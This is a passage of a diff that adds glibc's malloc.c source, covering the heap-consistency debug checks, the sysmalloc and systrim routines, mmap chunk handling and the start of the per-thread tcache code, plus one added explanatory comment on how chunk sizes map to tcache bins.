+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (p) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = p->size & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programming errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum), this only
+         happens for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If we have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignment unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If we have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if the first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least), so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap fails, the process's virtual memory address space is in a
+     bad shape.  Just leave the block hanging around; the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); the counts exist purely for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread char tcache_shutting_down = 0;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there are
+   available chunks to remove.  */
+static void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
+
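+/* Worked example, not from the glibc sources: on a 64-bit build,
+   csize2tidx maps chunk sizes 0x20, 0x30, ..., 0x410 to tcache bins
+   0..63, so with TCACHE_MAX_BINS == 64 requests of up to 0x408 user
+   bytes are tcache-eligible.  Each bin is a LIFO singly linked list:
+   the entry most recently stored by tcache_put is the first one handed
+   back by tcache_get.  */
+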
+static void __attribute__ ((section ("__libc_thread_freeres_fn")))
+tcache_thread_freeres (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  tcache = NULL;
+
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+
+  tcache_shutting_down = 1;
+}
+text_set_element (__libc_thread_subfreeres, tcache_thread_freeres);
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
